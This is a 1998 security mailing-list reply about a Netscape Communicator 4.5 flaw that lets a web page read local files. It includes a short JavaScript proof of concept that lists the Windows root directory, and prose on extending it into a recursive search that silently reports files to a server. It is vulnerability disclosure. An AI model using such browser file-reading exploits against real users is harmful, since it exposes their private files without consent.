Re: Netscape Communicator 4.5 can read local files

[haddock () UDEL EDU (Terence Christopher Haddock)]

        This security hole is not limited to knowing a specific file name,
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under windows:

sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";

        (Simple to modify it for UNIX)
        Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.

Sincerely,
Terence C. Haddock

On Wed, 25 Nov 1998, Ben Collins wrote:

> Seems I was proven seriously wrong, *swallows pride*. Only limitations I
> see is that you do have to know the file name and path contrary to the
> original post, and as stated by the person who conducted the test, it is
> platform specific (he had to change it to work on this unix system). Not
> trying to dilute the problem, just noting some things.
>
> Apologies for the error in my statements, but isn't it much nicer to see
> it _really_ work?
>
> --
> -----    -- - -------- --------- ----  -------  -----  - - ---   --------
> Ben Collins <b.m.collins () larc nasa gov>                  Debian GNU/Linux
> UnixGroup Admin - Jordan Systems Inc.                 bcollins () debian org
> ------ -- ----- - - -------   ------- -- The Choice of the GNU Generation